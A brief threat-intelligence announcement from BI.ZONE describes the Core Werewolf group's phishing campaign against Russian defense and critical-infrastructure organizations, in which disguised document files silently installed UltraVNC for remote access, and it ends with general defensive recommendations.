BI.ZONE uncovers espionage attacks on the defense industry and critical infrastructure
The threat actors target confidential information about Russia’s critically important facilities.
There is a growing trend among cybercriminals and APT groups toward employing legitimate tools. This enables them to remain undetected for a long time.
Core Werewolf is one such APT group, whose activity can be traced back to August 2021. The group has been engaged in cyberattacks ever since. BI.ZONE Cyber Threat Intelligence examined the documents used by the adversaries to mislead their victims. It was established that the spies primarily targeted Russian organizations associated with the defense industry and critical infrastructure.
To penetrate the infrastructure, the attackers sent phishing emails with the links to malicious files. The files were disguised as .docx and .pdf documents and contained decrees, orders, guidelines, memos, and resumes. Hence, the content of the documents did not raise any concern with the user. However, opening the file triggered the background installation of UltraVNC. This legitimate software is often used to connect to computers remotely and has been leveraged by the attackers to gain access to compromised devices.
Mitigating the risk of such attacks requires adopting both reactive and proactive detection of cyber threats. BI.ZONE experts recommend special email protection solutions that block harmful messages. On top of that, implementing security event monitoring is essential in tracking suspicious behavior of legitimate programs.